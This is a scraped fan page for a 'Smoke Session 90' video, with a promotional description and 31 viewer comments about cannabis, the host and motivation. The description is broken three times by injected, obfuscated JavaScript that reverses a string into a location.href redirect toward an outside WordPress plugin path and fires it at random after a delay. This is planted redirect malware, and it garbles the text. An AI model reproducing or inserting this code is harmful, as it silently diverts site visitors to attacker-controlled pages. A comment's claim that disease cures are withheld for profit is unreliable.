Smoke Session 90 | EXTENDED

Become A Patron Today!

Stay tuned for the extended Patreon Plate being served at the end! This video was super chill yet turned up toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to show you the meals we casually serve regularly :)! So please enjoy my rants and rambles and make sure toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to become a Patron toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}today!


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31 thoughts on “Smoke Session 90 | EXTENDED”

  1. TheFashionFag says:

    Mama and you better believe I feel that PASSION!

  2. Jeremy Ithier says:

    I'm dying to watch more videos like this and the wrestling gameplay in the end had me cackling. Qaadir pray that I get some replies from these job applications I've been filling out so I can treat us both with some coin.

  3. Christian Frazier says:

    lmao Q is the friend in rotation that holds the blunt while telling a story and letting it go out. I love it!!!

  4. Vin Navarre says:

    I became a Patreon about a month ago. I love all the services and the live shows. I also love having access to the archived videos. Staying subscribed!

  5. Jessica Stoddart says:

    I just love you Qaadir!!! And this smoke session!

  6. 1ManArme Games says:

    Okay…. now I don't smoke weed or know how to blow it….but you have the fiercest smoke blow I've ever seen lol

  7. Piggy Von Monroe says:

    You play league of legends?! I fucking love you even more now xx ! greetings from UK x

  8. Piggy Von Monroe says:

    You play league of legends?! I fucking love you even more now xx ! greetings from UK x

  9. nhatii shoulars says:

    I just want to let you know quadir I've been watching you since I was thirteen know I'm nineteen and to watch you revolve into this amazing Individual I mean is truly amazing!Espically since I'm a college student I needed your wise words Today.and I believe you will succeed in everything you do because you that speak into existence and look how far you've come!!!you are truly an inspiration.

  10. missivy phillips says:

    Like I always say, if you're selling, they're buying. (even unhealthy or unwholesome things lol)

  11. UsenRecords says:

    I love when quaadir started talking about the math and why we learn that bull shit " three girls leave the house at 2am and reach the house at 10am, how long did it take for Gina and lola to get to the house?" Lol that shit used to make me laugh lol

  12. UsenRecords says:

    Can you use paypal for patreon cause I want to get it but use paypal cause it's always feels safe for me

  13. Ohkeish says:

    you are soo reall!!!! I love it speaking facts

  14. She Ninja says:

    This is easily one of my favorite videos I loved it and I definitely will become a patron.

  15. Kinomi Dorsey says:

    Just rolled my blunt I'm late but I made it

  16. LilKimNiece says:

    bring back a legendary song and use it for your intro

  17. Lovely JunkMailer says:

    At some point i had to go back 30min because I completely spaced out.

  18. Sibonelo Ngubane says:

    Your wisdom always resonates with my spirit. Thank you.

  19. tastePINK says:

    The MEAL you served. When you said I digress after some two minutes 30 seconds… I really wanted you to KEEP GOING!!! Ugh, I'm making wigs right now and I will keep your video going until it's finished. #FULLMEAL And your comments on YouTube Black … sheesh. Interesting perspective to take in! THANK YOU SO MUCH!!!! FOR CONTINUING TO SHARE YOUR TALENT/PASSION. I SUPPORT YOU!

  20. elijah9987 says:

    I've watched your videos for years and never commented , but this particular video was so motivational for me right now. Thanks for this message . ❤️

  21. barbaydian261 says:

    Your intro is everything…. it gives me club and everything

  22. roseopl7 says:

    I've watched you for years. You should be able to live off YouTube

  23. Caitlinbc says:

    You should run for public office.

  24. Retta 1970 says:

    I respect people out here creating there own business and opportunities. Don't underestimate how courageous you are, not everyone has the inner fire to do it. BTW, one pot head to another, always keep a drawer full of colorful, fun lighters. More handy than lighters. By the way, have you tried the vape pen (very discrete when you are out and about – no smell).
    Much Respect, much peace.

  25. naturalforme says:

    You said nothing but the truth! I also told myself that if someone were to ask me what time period I would like to live in I would say the 1950s or 1960s because back then black people fought for what they wanted. Black people were ready to say fuck this 9 to 5 I'm going to this march but suddenly now that we are thrown a few peanuts and some change we think that everything is okay. We are getting too comfortable with where we are and that shit bothers me!! Why do we see peanuts as enough? Why don't we REALLY want change?

  26. naturalforme says:

    Hold tf up bitch!! We've been bamboozled! You just woke me tf up

  27. rob72694 says:

    Yes divide and conquer that's what they want and the sad thing is we all fall for it and hate each other

  28. rob72694 says:

    They don't wanna cure disease such as cancer and aids because it's a multi billion dollar industry

  29. Parris Summers says:

    They want you to be crabs in a barrel only different barrels

  30. sasha lewis says:

    27.12 Revelations! why have I never thought like that before. DAMN.

  31. N. Lemmons-Riley says:

    Omg. I'm busy right now, can't wait to watch this later. #SlayBoo

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